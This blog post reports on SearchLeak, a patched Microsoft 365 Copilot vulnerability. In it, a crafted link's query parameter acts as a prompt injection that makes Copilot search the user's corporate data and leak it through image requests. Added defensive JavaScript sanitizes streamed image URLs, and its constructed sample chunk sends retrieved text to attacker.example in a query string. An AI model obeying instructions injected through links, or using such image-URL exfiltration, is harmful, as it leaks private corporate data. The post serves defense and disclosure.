Lilith

Varonis researchers disclosed SearchLeak, a vulnerability chain in Microsoft 365 Copilot Enterprise Search that Microsoft fixed as CVE-2026-42824. Public reports describe a combination of Parameter-to-Prompt injection, an HTML rendering race condition and a Content Security Policy bypass through Bing image search infrastructure.

One link could trigger a search across corporate data

The attack was ugly because it used Copilot’s intended strength. A victim clicked a crafted link and the query parameter reached Copilot as an instruction. Copilot could then search data the user was allowed to access, including email, calendar, OneDrive and SharePoint.

Reports say sensitive content could be exfiltrated through image requests before output sanitization had fully blocked the response. Microsoft fixed the issue server-side before public disclosure, so available reports say administrators did not need to deploy a client update.

Copilot inherited the user’s permissions and therefore the user’s risk

In a normal chatbot, prompt injection is often embarrassing but contained. In Microsoft 365 Copilot, the same class of bug matters more because the model sits above a corporate index. Access to email, documents and calendar is exactly why the product is useful. It is also why a bug quickly becomes an incident.

For security teams, the practical lesson is clear: an AI assistant connected to data needs the same treatment as a highly privileged internal application. Auditing the model is not enough. Teams have to audit data flow, output rendering, permissions, logs and exfiltration paths through channels that look harmless.
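One concrete piece of that audit is the output-rendering path. The reports above describe data leaving through image requests before sanitization had finished, so the two properties a client needs are: only images from an allowlisted host, with no query string, are ever fetched, and no image element reaches the renderer while it is still being streamed. The guard below is an added example written for this post; it is not code from the original article, Varonis or Microsoft. It assumes the assistant returns Markdown, that the renderer has raw HTML disabled, and that the tenant maintains an allowlist of image hosts. `ALLOWED_IMAGE_HOSTS` and the sample chunks are constructed placeholders.

```javascript
// Added example, not code from the original post, Varonis or Microsoft.
// A client-side guard that treats assistant output as untrusted Markdown and closes
// the image-request exfiltration channel: inline images render only if the URL is
// https, on a tenant allowlist and free of a query string, and an image element is
// never handed to the renderer before it is complete.
// Assumptions: ALLOWED_IMAGE_HOSTS and CONSTRUCTED_CHUNKS are placeholders; the
// renderer has raw HTML disabled, so Markdown images are the only image path.

const ALLOWED_IMAGE_HOSTS = new Set(["images.example-tenant.internal"]); // placeholder

// ![alt](url) or ![alt](url "title"); the URL may not contain ')' or whitespace.
const IMAGE_RE = /!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;
const IMAGE_AT_START = /^!\[[^\]]*\]\([^)\s]+(?:\s+"[^"]*")?\)/;

// Returns null when the URL may be fetched, otherwise a short reason for the audit log.
function classifyImageUrl(raw) {
  let url;
  try { url = new URL(raw); } catch { return "unparseable URL"; } // relative URLs rejected too
  if (url.protocol !== "https:") return "not https";
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return "host not allowlisted";
  // Data leaves through the query string even on a trusted host, so none is permitted.
  if (url.search !== "") return "query string present";
  return null;
}

// Rewrite every complete image element in `markdown`; unsafe ones become plain text.
function sanitizeComplete(markdown) {
  const findings = [];
  const text = markdown.replace(IMAGE_RE, (whole, alt, url) => {
    const reason = classifyImageUrl(url);
    if (reason === null) return whole;
    findings.push({ url, reason });
    return `[image removed: ${alt || "untitled"}]`;
  });
  return { text, findings };
}

// Streaming wrapper. The race described in the post is the renderer seeing an image
// element before sanitization ran. Text is released only up to the first unfinished
// "![" construct; that tail waits for more chunks or for flush().
class StreamingImageGuard {
  constructor() { this.pending = ""; this.findings = []; }

  push(chunk) {
    this.pending += chunk;
    let safeEnd = this.pending.length;
    let from = 0;
    for (;;) {
      const open = this.pending.indexOf("![", from);
      if (open === -1) break;
      const m = IMAGE_AT_START.exec(this.pending.slice(open));
      if (m === null) { safeEnd = open; break; } // unfinished element: hold it back
      from = open + m[0].length;
    }
    const releasable = this.pending.slice(0, safeEnd);
    this.pending = this.pending.slice(safeEnd);
    const { text, findings } = sanitizeComplete(releasable);
    this.findings.push(...findings);
    return text;
  }

  // End of stream: anything still pending is an unterminated image element. It is
  // emitted as escaped literal text so Markdown cannot turn it into a request.
  flush() {
    const tail = this.pending;
    this.pending = "";
    if (tail === "") return "";
    this.findings.push({ url: null, reason: "unterminated image element at end of stream" });
    return tail.replace(/!\[/g, "!\\[");
  }
}

// Constructed sample: a reply that smuggles retrieved text into an image URL, split
// across chunks the way a streamed response would arrive.
const CONSTRUCTED_CHUNKS = [
  "Here is the summary you asked for.\n\n",
  "![status](https://attacker.example/pixel.png?d=",
  "Q3%20board%20notes%3A%20layoffs",
  ")\n\nChart: ![chart](https://images.example-tenant.internal/chart.png)\n",
];

// Runs the guard over a chunk sequence; returns what the renderer would receive
// plus the findings an audit log should record.
function guardStream(chunks) {
  const guard = new StreamingImageGuard();
  let rendered = "";
  for (const c of chunks) rendered += guard.push(c);
  rendered += guard.flush();
  return { rendered, findings: guard.findings };
}

const demo = guardStream(CONSTRUCTED_CHUNKS);
console.log(demo.rendered);
console.log(demo.findings);
```

The allowlist is deliberately paired with a no-query-string rule: an allowlisted CDN is still a leak if the URL's query can carry retrieved text. The findings array is what a detection team wants to forward, since a removed image with an off-tenant host in an assistant reply is a strong signal that injected instructions reached the model.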

Patching one CVE does not remove the attack class

SearchLeak is patched, but similar scenarios will return. Prompt injection is hard to filter with blacklists because malicious intent can be rephrased endlessly. Add a web flaw or a rendering race and the LLM problem immediately becomes a classic application-security problem.

This is where the word “assistant” becomes misleading. The product behaves like a layer above corporate memory, so it needs defenses against outside text telling it what to pull from that memory.

The decisive signals are permission boundaries and escape routes

Watch whether Microsoft and other enterprise AI vendors publish more detailed security architecture: how they separate instructions from data, how they test prompt injection, how they restrict output channels and how quickly they can disable risky integrations.

The second signal will come from customers. If Copilot and similar tools are deployed without a separate threat model, the next incident will not be surprising. It will be the bill for convenience.

Lilith's verdict

Copilot with email access is an intern holding a universal office badge. Useful, maybe, but doors should open by policy, not because a sentence in a stranger’s link asked nicely.

I keep the external link at the end. First, a concise explanation here — no hunting across someone else's site.

Original source ↗